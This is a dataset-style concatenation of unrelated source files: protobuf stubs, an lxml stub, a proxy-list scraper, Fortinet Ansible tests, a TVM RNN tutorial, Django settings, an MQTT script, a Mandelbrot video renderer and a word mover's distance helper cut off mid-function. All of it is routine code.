@classmethod
def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> HorizontalPodAutoscaler.ScaleTargetRef: ...
def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def ClearField(self, field_name: typing_extensions___Literal[u"apiVersion",b"apiVersion",u"kind",b"kind",u"name",b"name"]) -> None: ...
class Metrics(google___protobuf___message___Message):
DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
type = ... # type: typing___Text
@property
def resource(self) -> cmdb_sdk___model___container___resource_metric_source_pb2___ResourceMetricSource: ...
def __init__(self,
*,
type : typing___Optional[typing___Text] = None,
resource : typing___Optional[cmdb_sdk___model___container___resource_metric_source_pb2___ResourceMetricSource] = None,
) -> None: ...
if sys.version_info >= (3,):
@classmethod
def FromString(cls, s: builtin___bytes) -> HorizontalPodAutoscaler.Metrics: ...
else:
@classmethod
def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> HorizontalPodAutoscaler.Metrics: ...
def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def HasField(self, field_name: typing_extensions___Literal[u"resource",b"resource"]) -> builtin___bool: ...
def ClearField(self, field_name: typing_extensions___Literal[u"resource",b"resource",u"type",b"type"]) -> None: ...
instanceId = ... # type: typing___Text
resourceName = ... # type: typing___Text
namespace = ... # type: typing___Text
minReplicas = ... # type: builtin___int
maxReplicas = ... # type: builtin___int
@property
def scaleTargetRef(self) -> HorizontalPodAutoscaler.ScaleTargetRef: ...
@property
def metrics(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[HorizontalPodAutoscaler.Metrics]: ...
def __init__(self,
*,
instanceId : typing___Optional[typing___Text] = None,
resourceName : typing___Optional[typing___Text] = None,
namespace : typing___Optional[typing___Text] = None,
scaleTargetRef : typing___Optional[HorizontalPodAutoscaler.ScaleTargetRef] = None,
minReplicas : typing___Optional[builtin___int] = None,
maxReplicas : typing___Optional[builtin___int] = None,
metrics : typing___Optional[typing___Iterable[HorizontalPodAutoscaler.Metrics]] = None,
) -> None: ...
if sys.version_info >= (3,):
@classmethod
def FromString(cls, s: builtin___bytes) -> HorizontalPodAutoscaler: ...
else:
@classmethod
def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> HorizontalPodAutoscaler: ...
def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def HasField(self, field_name: typing_extensions___Literal[u"scaleTargetRef",b"scaleTargetRef"]) -> builtin___bool: ...
def ClearField(self, field_name: typing_extensions___Literal[u"instanceId",b"instanceId",u"maxReplicas",b"maxReplicas",u"metrics",b"metrics",u"minReplicas",b"minReplicas",u"namespace",b"namespace",u"resourceName",b"resourceName",u"scaleTargetRef",b"scaleTargetRef"]) -> None: ...
| [
"service@easyops.cn"
] | service@easyops.cn |
642b38a413df309b7c1b02b03690ef51953c2841 | b25182d0034468e5e545c6c72e5a2cdd3c43a484 | /.PyCharm2017.2/system/python_stubs/-223353804/lxml/etree/DTD.py | 4a9de7fc7e62c4dfc3e361e63287deb22bbafd98 | [] | no_license | lovewula/config | f9ac16b30082c04be7733969d5359ee6c7258db6 | c0720e5bfd49f579a52f83de36de40c76996ebf6 | refs/heads/master | 2021-08-19T19:31:44.088218 | 2017-11-27T08:04:06 | 2017-11-27T08:04:06 | 111,974,690 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,892 | py | # encoding: utf-8
# module lxml.etree
# from D:\Python\Python27\lib\site-packages\lxml\etree.pyd
# by generator 1.145
""" The ``lxml.etree`` module implements the extended ElementTree API for XML. """
# imports
import __builtin__ as __builtins__ # <module '__builtin__' (built-in)>
from _Validator import _Validator
class DTD(_Validator):
"""
DTD(self, file=None, external_id=None)
A DTD validator.
Can load from filesystem directly given a filename or file-like object.
Alternatively, pass the keyword parameter ``external_id`` to load from a
catalog.
"""
def elements(self, *args, **kwargs): # real signature unknown
pass
def entities(self, *args, **kwargs): # real signature unknown
pass
def iterelements(self, *args, **kwargs): # real signature unknown
pass
def iterentities(self, *args, **kwargs): # real signature unknown
pass
def __call__(self, etree): # real signature unknown; restored from __doc__
"""
__call__(self, etree)
Validate doc using the DTD.
Returns true if the document is valid, false if not.
"""
pass
def __init__(self, file=None, external_id=None): # real signature unknown; restored from __doc__
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
external_id = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
name = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
system_url = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
__pyx_vtable__ = None # (!) real value is ''
| [
"lovewula1314@gmail.com"
] | lovewula1314@gmail.com |
568c23ea6c150f1790bd62cfcdcca3c4eb2884d9 | cca5ceb42b09e567d79fcb46f298757c1ff04447 | /Requests/ProxyIP.py | 16b5e0c5908fa2e51b4e45542a118d54b3bdf395 | [] | no_license | NishantGhanate/PythonScripts | 92933237720e624a0f672729743a98557bea79d6 | 60b92984d21394002c0d3920bc448c698e0402ca | refs/heads/master | 2022-12-13T11:56:14.442286 | 2022-11-18T14:26:33 | 2022-11-18T14:26:33 | 132,910,530 | 25 | 15 | null | 2022-12-09T09:03:58 | 2018-05-10T14:18:33 | Python | UTF-8 | Python | false | false | 536 | py | import requests
from lxml.html import fromstring
def get_proxies():
url = 'https://free-proxy-list.net/'
response = requests.get(url)
parser = fromstring(response.text)
proxies = set()
for i in parser.xpath('//tbody/tr')[:20]:
if i.xpath('.//td[7][contains(text(),"yes")]'):
#Grabbing IP and corresponding PORT
proxy = ":".join([i.xpath('.//td[1]/text()')[0], i.xpath('.//td[2]/text()')[0]])
proxies.add(proxy)
return proxies
proxies = get_proxies()
print(proxies) | [
"nishant7.ng@gmail.com"
] | nishant7.ng@gmail.com |
d3c160de4501cb84be1bc3e5585762ce8b657d36 | 27e890f900bd4bfb2e66f4eab85bc381cf4d5d3f | /tests/unit/modules/network/fortios/test_fortios_switch_controller_quarantine.py | 4093a700e7f1a2da8709a47b049c6a23e71f795d | [] | no_license | coll-test/notstdlib.moveitallout | eb33a560070bbded5032385d0aea2f3cf60e690b | 0987f099b783c6cf977db9233e1c3d9efcbcb3c7 | refs/heads/master | 2020-12-19T22:28:33.369557 | 2020-01-23T18:51:26 | 2020-01-23T18:51:26 | 235,865,139 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,077 | py | # Copyright 2019 Fortinet, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <https://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import json
import pytest
from mock import ANY
from ansible_collections.notstdlib.moveitallout.plugins.module_utils.network.fortios.fortios import FortiOSHandler
try:
from ansible_collections.notstdlib.moveitallout.plugins.modules import fortios_switch_controller_quarantine
except ImportError:
pytest.skip("Could not load required modules for testing", allow_module_level=True)
@pytest.fixture(autouse=True)
def connection_mock(mocker):
connection_class_mock = mocker.patch('ansible_collections.notstdlib.moveitallout.plugins.modules.fortios_switch_controller_quarantine.Connection')
return connection_class_mock
fos_instance = FortiOSHandler(connection_mock)
def test_switch_controller_quarantine_creation(mocker):
schema_method_mock = mocker.patch('ansible_collections.notstdlib.moveitallout.plugins.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
set_method_mock = mocker.patch('ansible_collections.notstdlib.moveitallout.plugins.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'switch_controller_quarantine': {
'quarantine': 'enable',
},
'vdom': 'root'}
is_error, changed, response = fortios_switch_controller_quarantine.fortios_switch_controller(input_data, fos_instance)
expected_data = {
'quarantine': 'enable',
}
set_method_mock.assert_called_with('switch-controller', 'quarantine', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
def test_switch_controller_quarantine_creation_fails(mocker):
schema_method_mock = mocker.patch('ansible_collections.notstdlib.moveitallout.plugins.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'error', 'http_method': 'POST', 'http_status': 500}
set_method_mock = mocker.patch('ansible_collections.notstdlib.moveitallout.plugins.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'switch_controller_quarantine': {
'quarantine': 'enable',
},
'vdom': 'root'}
is_error, changed, response = fortios_switch_controller_quarantine.fortios_switch_controller(input_data, fos_instance)
expected_data = {
'quarantine': 'enable',
}
set_method_mock.assert_called_with('switch-controller', 'quarantine', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 500
def test_switch_controller_quarantine_idempotent(mocker):
schema_method_mock = mocker.patch('ansible_collections.notstdlib.moveitallout.plugins.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'error', 'http_method': 'DELETE', 'http_status': 404}
set_method_mock = mocker.patch('ansible_collections.notstdlib.moveitallout.plugins.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'switch_controller_quarantine': {
'quarantine': 'enable',
},
'vdom': 'root'}
is_error, changed, response = fortios_switch_controller_quarantine.fortios_switch_controller(input_data, fos_instance)
expected_data = {
'quarantine': 'enable',
}
set_method_mock.assert_called_with('switch-controller', 'quarantine', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 404
def test_switch_controller_quarantine_filter_foreign_attributes(mocker):
schema_method_mock = mocker.patch('ansible_collections.notstdlib.moveitallout.plugins.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
set_method_mock = mocker.patch('ansible_collections.notstdlib.moveitallout.plugins.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'switch_controller_quarantine': {
'random_attribute_not_valid': 'tag',
'quarantine': 'enable',
},
'vdom': 'root'}
is_error, changed, response = fortios_switch_controller_quarantine.fortios_switch_controller(input_data, fos_instance)
expected_data = {
'quarantine': 'enable',
}
set_method_mock.assert_called_with('switch-controller', 'quarantine', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
| [
"wk@sydorenko.org.ua"
] | wk@sydorenko.org.ua |
eec408b4327d41fd937c2ad9c5fbdfce8c90427b | 777844bd87b2e87bb992af18bdf13ca1b2c747fd | /nnvm/tutorials/nlp/from_darknet_rnn.py | bbf70c724bbe43a4aeba64d71b5443cd3a88be94 | [
"Apache-2.0"
] | permissive | FrozenGene/tvm | 5a6d875e39af0f2c00e1508bf33a3f699ae9ac27 | fbd1c16484b5710a48717b9cf50f424326a84cca | refs/heads/master | 2021-06-18T09:14:49.173534 | 2019-04-02T00:10:16 | 2019-04-02T00:10:16 | 155,194,851 | 1 | 2 | Apache-2.0 | 2018-10-29T10:43:18 | 2018-10-29T10:43:18 | null | UTF-8 | Python | false | false | 5,383 | py | """
Compile Darknet Models for RNN
==============================
**Author**: `Siju Samuel <https://siju-samuel.github.io/>`_
This article is an introductory tutorial to deploy darknet rnn models with NNVM.
This script will run a character prediction model
Each module consists of 3 fully-connected layers. The input layer propagates information from the
input to the current state. The recurrent layer propagates information through time from the
previous state to the current one.
The input to the network is a 1-hot encoding of ASCII characters. We train the network to predict
the next character in a stream of characters. The output is constrained to be a probability
distribution using a softmax layer.
Since each recurrent layer contains information about the current character and the past
characters, it can use this context to predict the future characters in a word or phrase.
All the required models and libraries will be downloaded from the internet
by the script.
"""
import random
import numpy as np
import tvm
from tvm.contrib import graph_runtime
from tvm.contrib.download import download_testdata
from nnvm.testing.darknet import __darknetffi__
import nnvm
import nnvm.frontend.darknet
# Set the parameters
# -----------------------
# Set the seed value and the number of characters to predict
#Model name
MODEL_NAME = 'rnn'
#Seed value
seed = 'Thus'
#Number of characters to predict
num = 1000
# Download required files
# -----------------------
# Download cfg and weights file if first time.
CFG_NAME = MODEL_NAME + '.cfg'
WEIGHTS_NAME = MODEL_NAME + '.weights'
REPO_URL = 'https://github.com/dmlc/web-data/blob/master/darknet/'
CFG_URL = REPO_URL + 'cfg/' + CFG_NAME + '?raw=true'
WEIGHTS_URL = REPO_URL + 'weights/' + WEIGHTS_NAME + '?raw=true'
cfg_path = download_testdata(CFG_URL, CFG_NAME, module='darknet')
weights_path = download_testdata(WEIGHTS_URL, WEIGHTS_NAME, module='darknet')
# Download and Load darknet library
DARKNET_LIB = 'libdarknet.so'
DARKNET_URL = REPO_URL + 'lib/' + DARKNET_LIB + '?raw=true'
lib_path = download_testdata(DARKNET_URL, DARKNET_LIB, module='darknet')
DARKNET_LIB = __darknetffi__.dlopen(lib_path)
net = DARKNET_LIB.load_network(cfg_path.encode('utf-8'), weights_path.encode('utf-8'), 0)
dtype = 'float32'
batch_size = 1
# Import the graph to NNVM
# ------------------------
# Import darknet graph definition to nnvm.
#
# Results:
# sym: nnvm graph for rnn model
# params: params converted from darknet weights
print("Converting darknet rnn model to nnvm symbols...")
sym, params = nnvm.frontend.darknet.from_darknet(net, dtype)
# Compile the model on NNVM
data = np.empty([1, net.inputs], dtype)#net.inputs
target = 'llvm'
shape = {'data': data.shape}
print("Compiling the model...")
shape_dict = {'data': data.shape}
dtype_dict = {'data': data.dtype}
with nnvm.compiler.build_config(opt_level=2):
graph, lib, params = nnvm.compiler.build(sym, target, shape_dict, dtype_dict, params)
# Execute the portable graph on TVM
# ---------------------------------
# Now we can try deploying the NNVM compiled model on cpu target.
# Set the cpu context
ctx = tvm.cpu(0)
# Create graph runtime
m = graph_runtime.create(graph, lib, ctx)
# Set the params to runtime
m.set_input(**params)
def _init_state_memory(rnn_cells_count, dtype):
'''Initialize memory for states'''
states = {}
state_shape = (1024,)
for i in range(rnn_cells_count):
k = 'rnn' + str(i) + '_state'
states[k] = tvm.nd.array(np.zeros(state_shape, dtype).astype(dtype))
return states
def _set_state_input(runtime, states):
'''Set the state inputs'''
for state in states:
runtime.set_input(state, states[state])
def _get_state_output(runtime, states):
'''Get the state outputs and save'''
i = 1
for state in states:
data = states[state]
states[state] = runtime.get_output((i), tvm.nd.empty(data.shape, data.dtype))
i += 1
def _proc_rnn_output(out_data):
'''Generate the characters from the output array'''
sum_array = 0
n = out_data.size
r = random.uniform(0, 1)
for j in range(n):
if out_data[j] < 0.0001:
out_data[j] = 0
sum_array += out_data[j]
for j in range(n):
out_data[j] *= float(1.0) / sum_array
r = r - out_data[j]
if r <= 0:
return j
return n-1
print("RNN generaring text...")
out_shape = (net.outputs,)
rnn_cells_count = 3
# Initialize state memory
# -----------------------
states = _init_state_memory(rnn_cells_count, dtype)
len_seed = len(seed)
count = len_seed + num
out_txt = ""
#Initialize random seed
random.seed(0)
c = ord(seed[0])
inp_data = np.zeros([net.inputs], dtype)
# Run the model
# -------------
# Predict character by character till `num`
for i in range(count):
inp_data[c] = 1
# Set the input data
m.set_input('data', tvm.nd.array(inp_data.astype(dtype)))
inp_data[c] = 0
# Set the state inputs
_set_state_input(m, states)
# Run the model
m.run()
# Get the output
tvm_out = m.get_output(0, tvm.nd.empty(out_shape, dtype)).asnumpy()
# Get the state outputs
_get_state_output(m, states)
# Get the predicted character and keep buffering it
c = ord(seed[i]) if i < len_seed else _proc_rnn_output(tvm_out)
out_txt += chr(c)
print("Predicted Text =", out_txt)
| [
"tqchen@users.noreply.github.com"
] | tqchen@users.noreply.github.com |
9e786306217ad5c74dde5a37eab383d4a736229b | d7a1b26449211f4ea67dce9370f6558f16df992c | /todo/settings.py | 1e4b4da5176e67e3e8e7a02f0936daf740f04dde | [] | no_license | SonerArslan2019/ToDoAPP_Django_BULMA | 8c245b49e2f8f6e35d34b9cf34bdc923fc065ce5 | 8a0c8d97699b856c7634b2a98692b9311a0bf183 | refs/heads/master | 2023-04-15T08:33:19.635367 | 2021-04-25T19:11:18 | 2021-04-25T19:11:18 | 361,483,184 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,296 | py | """
Django settings for todo project.
Generated by 'django-admin startproject' using Django 3.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'django-insecure-m_+a)4*n05ypamd=ul=$^eiubs7p62elic_g#z%ppfhfpc^*s('
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'todoapp',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'todo.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [BASE_DIR / 'templates'],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'todo.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
# AUTH_PASSWORD_VALIDATORS = [
# {
# 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
# },
# {
# 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
# },
# {
# 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
# },
# {
# 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
# },
# ]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
| [
"soner@arslanyapi.com.tr"
] | soner@arslanyapi.com.tr |
71ec5eb99a91022cff32c68fb9a82d33c1fe8b5a | 2a5c0c49319989a24f9c9f18530f109bc48a8df1 | /CursesEnded/SecondYear/PythonJava(InternetOfThings)/list5/driver2.py | c165f04582e1365ac5166f1e5e28d3e6b1d1892d | [] | no_license | Kamil-IT/Studies | 0ada6dd92d7ecdbd0a3164c7c80080dd715ce8fc | d70343b2b7818ce303d816443bb15d21e03b42e0 | refs/heads/master | 2022-12-22T01:55:35.047783 | 2022-10-20T18:55:29 | 2022-10-20T18:55:29 | 217,039,987 | 0 | 1 | null | 2022-12-10T06:03:55 | 2019-10-23T11:24:33 | Jupyter Notebook | UTF-8 | Python | false | false | 1,105 | py | import json
import paho.mqtt.client as mqtt
import requests
def subscribe_topic(broker_url, topic, on_message):
client = mqtt.Client()
client.connect(broker_url)
client.subscribe(topic)
client.on_message = on_message
client.loop_forever()
def on_message_app2_driver(client, userdata, msg):
if 41.80 < float(json.loads(str(msg.payload.decode('utf-8')))["Latitude"]):
requests.post("http://127.0.0.1:6002/status", json={"reverse": "on", "status": "on"})
print("Latitude too big " + json.loads(str(msg.payload.decode('utf-8')))["Latitude"])
elif float(json.loads(str(msg.payload.decode('utf-8')))["Latitude"]) < 41.78:
requests.post("http://127.0.0.1:6002/status", json={"reverse": "off", "status": "on"})
print("Latitude too small " + json.loads(str(msg.payload.decode('utf-8')))["Latitude"])
else:
requests.post("http://127.0.0.1:6002/status", json={"status": "off"})
print("Latitude good")
def main():
subscribe_topic("127.0.0.1", "phone_location", on_message_app2_driver)
if __name__ == '__main__':
main()
| [
"kkwolny@vp.pl"
] | kkwolny@vp.pl |
eb13bc5a7c58a79ab899c6c06b92d27c1a45639b | 933ed73cdf117fc6c88c1ebba7a17b82807a16e8 | /docs/00.Python/demo_Chapter01/demo_python_structure/pkg/module1.py | 7fde6166ac45f7f13a4c86150943558d3d96b12d | [
"Apache-2.0"
] | permissive | wan230114/PythonNote | c4fff80f6f3849ed0b0346526d3c6197a4867d2c | f4989a44c03efdcea3f7aa3484e3470e7fd983eb | refs/heads/master | 2023-01-28T14:51:07.304066 | 2023-01-12T18:38:16 | 2023-01-12T18:38:16 | 242,367,069 | 5 | 6 | Apache-2.0 | 2021-01-05T23:35:10 | 2020-02-22T15:45:01 | JavaScript | UTF-8 | Python | false | false | 876 | py | """这是该模块1的说明文档"""
print("""这是模块1,它包含:
三个变量: a -- 数值对象, ClassName -- 类对象, func -- 函数对象
一个类: ClassName; 类方法有: __init__, main; 类属性有: self.arg
一个函数: func
五个语句块: 1 * class, 3 * def, 1 * for
七个语句: 5 * print, a = 520, self.arg = arg
""")
a = 520
class ClassName(object):
"""这是类的说明文档"""
def __init__(self, arg):
"""这是类默认方法的说明文档"""
self.arg = arg
def main(self):
"""这是类方法的说明文档"""
print("用于执行类方法的具体语句,打印该行字符串")
def func():
"""这是函数的说明文档"""
print("用于打印函数")
print("用于执行函数的具体语句,打印该行字符串")
for i in "123456":
print(i)
| [
"1170101471@qq.com"
] | 1170101471@qq.com |
eac26296fc7adb18685967c93a73c56898d63177 | 2bb90b620f86d0d49f19f01593e1a4cc3c2e7ba8 | /pardus/playground/mehmet/2011/python-pymodel/actions.py | 2f6b2f799e6cfaa6c12c1a1ad5670d9f8917771d | [] | no_license | aligulle1/kuller | bda0d59ce8400aa3c7ba9c7e19589f27313492f7 | 7f98de19be27d7a517fe19a37c814748f7e18ba6 | refs/heads/master | 2021-01-20T02:22:09.451356 | 2013-07-23T17:57:58 | 2013-07-23T17:57:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 822 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2011 TUBITAK/BILGEM
# Licensed under the GNU General Public License, version 2.
# See the file http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
from pisi.actionsapi import pisitools
from pisi.actionsapi import pythonmodules
instalDir = "/usr/lib/python2.7/site-packages"
def install():
pythonmodules.install()
pisitools.insinto("%s/python-pymodel" % instalDir, "pymodel/*")
for binary in ["pma.py", "pmg.py", "pmt.py", "trun.py", "dotsvg", \
"clogdiff", "tpath", "dotps", "wsgirunner.py"]:
pisitools.dosym("%s/python-pymodel/%s" % (instalDir, binary), \
"/usr/bin/%s" % binary)
pisitools.insinto("/usr/share/doc/python-pymodel", "samples")
pisitools.insinto("/usr/share/doc/python-pymodel", "notes")
| [
"yusuf.aydemir@istanbul.com"
] | yusuf.aydemir@istanbul.com |
e3f4ec202b116de4065c3adbc9dff68c89344718 | 7b3009e019e081667df67c6b41328b5db632b898 | /render_video.py | 2c1ab87baf640b84dd9b59daeeae4eb0ce89851e | [
"MIT"
] | permissive | frostburn/multibranch-mandelbrot | d1e2cc6bce6ab8f065b678fb2133bd3057b832d5 | 84e4887ffc90a5338ae448ced6f62fcf40bc11a1 | refs/heads/master | 2023-08-02T18:20:56.671175 | 2021-09-28T09:57:58 | 2021-09-28T09:57:58 | 287,219,716 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,123 | py | import argparse
from threading import Thread, Lock
import imageio
import progressbar
from pylab import *
from coloring import red_lavender, subharmonics
from mandelbrot import mandelbrot
RESOLUTIONS = {
"2160p": (3840, 2160),
"1440p": (2560, 1440),
"1080p": (1920, 1080),
"720p": (1280, 720),
"480p": (854, 480),
"360p": (640, 360),
"240p": (426, 240),
"160p": (284, 160),
"80p": (142, 80),
"40p": (71, 40),
}
def make_video_frame(rgb, indexing='ij', dither=1.0/256.0):
if dither:
rgb = [channel + random(channel.shape)*dither for channel in rgb]
if indexing == 'ij':
rgb = [channel.T for channel in rgb]
frame = stack(rgb, axis=-1)
frame = clip(frame, 0.0, 1.0)
return (frame * 255).astype('uint8')
def do_render(args, writer):
inside_cutoff = 2**9
color_map = subharmonics
for n in progressbar.progressbar(range(args.num_frames)):
t = n / (args.num_frames - 1)
x, y = -0.11042608495193805, -1.2321253969758166
zoom = t * 44 - 2
image = mandelbrot(args.width, args.height, x, y, zoom, 2.5, 66, color_map=color_map, anti_aliasing=args.anti_aliasing, inside_cutoff=inside_cutoff, clip_outside=True)
frame = make_video_frame(image, indexing=None)
writer.append_data(frame)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Render video frames of a Multi-branch Mandelbrot fractal')
parser.add_argument('outfile', type=str, help='Output file name')
parser.add_argument('--anti-aliasing', type=int, help='Anti-aliasing pixel subdivisions')
parser.add_argument('--resolution', choices=RESOLUTIONS.keys(), help='Video and simulation grid resolution')
parser.add_argument('--width', type=int, help='Video and simulation grid width', metavar='W')
parser.add_argument('--height', type=int, help='Video and simulation grid height', metavar='H')
parser.add_argument('--framerate', type=int, help='Video frame rate')
parser.add_argument('--video-quality', type=int, help='Video quality factor')
parser.add_argument('--video-duration', type=float, help='Duration of video to render in seconds')
args = parser.parse_args()
if not args.anti_aliasing:
args.anti_aliasing = 2
if not args.framerate:
args.framerate = 24
if not args.video_quality:
args.video_quality = 10
writer = imageio.get_writer(args.outfile, fps=args.framerate, quality=args.video_quality, macro_block_size=1)
# Compute derived parameters
if args.resolution:
width, height = RESOLUTIONS[args.resolution]
if not args.width:
args.width = width
if not args.height:
args.height = height
if (not args.width) or (not args.height):
raise ValueError("Invalid or missing resolution")
if not args.video_duration:
raise ValueError("Missing video duration")
args.aspect = args.width / args.height
args.num_frames = int(args.video_duration * args.framerate)
args.dt = 1.0 / args.num_frames
do_render(args, writer)
writer.close()
| [
"lumi.pakkanen@gmail.com"
] | lumi.pakkanen@gmail.com |
66b835b459e04052f8a621dc21cce79fcd3161d7 | 52877e2b60ed675eb16ea66c7398127294a313d3 | /t2t_bert/utils/wmd/emd_utils.py | 9cf43816e992e02220600b9cacca89a96f46c2b0 | [
"Apache-2.0"
] | permissive | yyht/BERT | 0dc82ea8e141cad4774e638dd7d44f781d77b6c3 | 480c909e0835a455606e829310ff949c9dd23549 | refs/heads/master | 2023-04-07T03:32:28.123608 | 2021-02-17T02:15:58 | 2021-02-17T02:15:58 | 162,232,730 | 37 | 12 | Apache-2.0 | 2022-11-21T21:15:04 | 2018-12-18T05:02:27 | Python | UTF-8 | Python | false | false | 2,167 | py | import numpy as np
from pyemd import emd
def wmd_distance(w2v_model, document1, document2, distance_metric=None):
len_pre_oov1 = len(document1)
len_pre_oov2 = len(document2)
document1 = [token for token in document1 if token in w2v_model]
document2 = [token for token in document2 if token in w2v_model]
diff1 = len_pre_oov1 - len(document1)
diff2 = len_pre_oov2 - len(document2)
dictionary = list(set(document1+document2))
vocab_len = len(dictionary)
if vocab_len == 1:
# Both documents are composed by a single unique token
return 0.0
# Sets for faster look-up.
docset1 = set(document1)
docset2 = set(document2)
# Compute distance matrix.
distance_matrix = np.zeros((vocab_len, vocab_len), dtype=np.double)
for i, t1 in enumerate(dictionary):
if t1 not in docset1:
continue
for j, t2 in enumerate(dictionary):
if t2 not in docset2 or distance_matrix[i, j] != 0.0:
continue
if distance_metric == 'euclidean':
# Compute Euclidean distance between word vectors.
euclidean_distance = sqrt(np.sum((w2v_model[t1] - w2v_model[t2])**2))
distance_matrix[i, j] = distance_matrix[j, i] = euclidean_distance
elif distance_metric == 'cosine':
t1_norm = np.sqrt(np.sum(np.power((w2v_model[t1]), 2)))
t2_norm = np.sqrt(np.sum(np.power((w2v_model[t2]), 2)))
cos_distance = np.sum(w2v_model[t1]*w2v_model[t2]) / (t1_norm*t2_norm+1e-10)
distance_matrix[i, j] = distance_matrix[j, i] = 1 - cos_distance
else:
euclidean_distance = np.sqrt(np.sum((w2v_model[t1] - w2v_model[t2])**2))
distance_matrix[i, j] = distance_matrix[j, i] = euclidean_distance
if np.sum(distance_matrix) == 0.0:
# `emd` gets stuck if the distance matrix contains only zeros.
return 1e-10
keys = dict((e[1], e[0]) for e in enumerate(dictionary))
def nbow(document):
d = np.zeros(vocab_len, dtype=np.double)
for word in document:
d[keys[word]] += 1
doc_len = len(document)
for idx, freq in enumerate(d):
